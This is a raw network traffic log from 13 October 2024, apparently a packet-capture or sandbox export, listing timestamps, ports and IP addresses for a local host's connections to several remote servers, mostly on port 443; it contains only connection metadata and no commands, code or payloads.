Oct 13, 2024 18:15:02.116225958 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.116676092 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.116693020 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.116741896 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.116755962 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.116785049 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.117233038 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.117244959 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.117314100 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.117328882 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.117753029 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.117780924 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.117841959 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.117856026 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.118031979 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.118063927 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.118102074 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.118118048 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.118169069 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.118649960 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.118664026 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.118683100 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.118724108 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.118738890 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.118763924 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.119206905 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.119223118 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.119272947 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.119288921 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.119323015 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.119812012 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.119826078 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.119854927 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.119894028 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.119909048 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.119937897 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.120256901 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.120290041 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.120327950 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.120342016 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.120394945 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.120656013 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.120670080 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.120734930 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.120748997 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.120805025 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.120866060 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.121320009 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.121331930 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.121403933 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.121418953 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.121872902 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.121890068 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.121932983 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.121938944 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.121953011 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.121984005 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.122606993 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.122620106 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.122685909 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.122701883 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.123446941 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.123462915 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.123512030 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.123526096 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.123557091 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.124654055 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.124666929 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.124720097 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.124735117 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.124767065 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.174911976 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.208257914 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.208316088 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.208416939 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.208460093 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.208566904 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.208568096 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.208632946 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.209131002 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.209213018 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.209455013 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.209475040 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.209741116 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.209779978 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.209830046 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.209844112 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.209867954 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.210566044 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.210597992 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.210642099 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.210655928 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.210684061 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.210989952 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.211036921 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.211066961 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.211081028 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.211108923 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.211139917 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.211230993 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.211311102 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.211330891 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.211982012 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.212003946 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.212044001 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.212066889 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.212100983 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.212467909 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.212483883 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.212544918 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.212568998 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.253227949 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.300451994 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.300470114 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.300498962 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.300518990 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.300585032 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.300609112 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.300669909 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.300714970 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.300779104 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.300792933 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.301254988 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.301270008 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.301338911 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.301352978 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.303776979 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.303795099 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.303853035 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.303868055 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304521084 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304534912 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304614067 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.304627895 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304666996 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304716110 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.304729939 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304754019 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304781914 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304821968 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.304837942 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304893970 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.304934978 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304953098 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.304977894 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.305022955 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.305037022 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.305069923 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.305144072 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.305161953 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.305198908 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.305212021 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.305248022 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.305526018 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.305540085 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.305661917 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.305676937 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.346823931 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.393415928 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.393455982 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.393522978 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.393587112 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.393670082 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.393671036 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.393691063 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.393739939 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.393767118 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.393779039 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.394234896 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.394253016 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.394299984 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.394314051 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.394352913 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.394725084 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.394738913 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.394797087 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.394812107 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.394844055 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.395375013 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.395404100 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.395443916 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.395447016 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.395462036 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.395507097 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.395768881 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.395806074 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.395844936 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.395860910 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.395915031 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.396253109 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.396269083 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.396296978 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.396330118 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.396343946 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.396372080 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.396908998 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.396929979 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.397003889 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.397003889 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.397021055 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.440555096 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.491960049 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.491985083 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.492037058 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.492049932 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.492223978 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.492223978 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.492290974 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.492415905 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.492435932 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.492674112 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.492674112 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.492744923 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.492805004 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.492805004 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.493109941 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.493124962 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.493151903 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.493199110 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.493216991 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.493253946 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.493505955 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.493525982 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.493571997 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.493587017 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.493621111 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.494087934 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.494116068 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.494154930 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.494174957 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.494200945 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.494523048 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.494538069 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.494582891 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.494597912 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.494627953 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.495155096 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.495172977 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.495229959 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.495248079 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.495589018 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.495604038 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.495656013 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.495672941 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.495702028 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.495985985 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.496292114 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.584666014 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.584683895 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.584706068 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.584727049 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.584757090 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.584785938 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.584880114 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.584881067 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.584881067 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.584949970 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.585197926 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.585263968 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.585274935 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.585295916 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.585355043 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.585378885 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.585410118 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.585455894 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.585469007 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.585496902 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.585498095 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.585556030 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.585963964 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:09.796471119 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:09.802479982 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:09.802563906 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:09.803808928 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:09.809659958 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:09.825046062 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:09.833103895 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:10.544711113 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:10.544724941 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:10.544796944 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:10.548999071 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:10.553783894 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:10.777982950 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:10.831355095 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:12.029671907 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:12.034723043 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:12.034802914 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:12.039854050 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:12.665822983 CEST	49734	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:12.665904999 CEST	443	49734	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:12.666018009 CEST	49734	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:12.670223951 CEST	49734	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:12.670257092 CEST	443	49734	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:14.270045042 CEST	443	49734	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:14.270123959 CEST	49734	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:14.271850109 CEST	49734	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:14.271891117 CEST	443	49734	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:14.272253990 CEST	443	49734	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:14.317608118 CEST	49734	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:14.322602034 CEST	49734	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:14.367425919 CEST	443	49734	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:14.738073111 CEST	443	49734	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:14.738096952 CEST	443	49734	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:14.738161087 CEST	443	49734	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:14.738177061 CEST	49734	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:14.738229990 CEST	49734	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:14.743915081 CEST	49734	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:14.767050028 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:14.767139912 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:14.767251015 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:14.767478943 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:14.767515898 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.331840992 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.332106113 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.333241940 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.333296061 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.333673000 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.335313082 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.375432014 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.473664999 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.475404978 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.475418091 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.475478888 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.475545883 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.475585938 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.475608110 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.563443899 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.563460112 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.563522100 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.563543081 CEST	443	49735	52.217.90.148	192.168.2.4
Oct 13, 2024 18:15:15.563600063 CEST	49735	443	192.168.2.4	52.217.90.148
Oct 13, 2024 18:15:15.565371990 CEST	443	49735	52.217.90.148	192.168.2.4
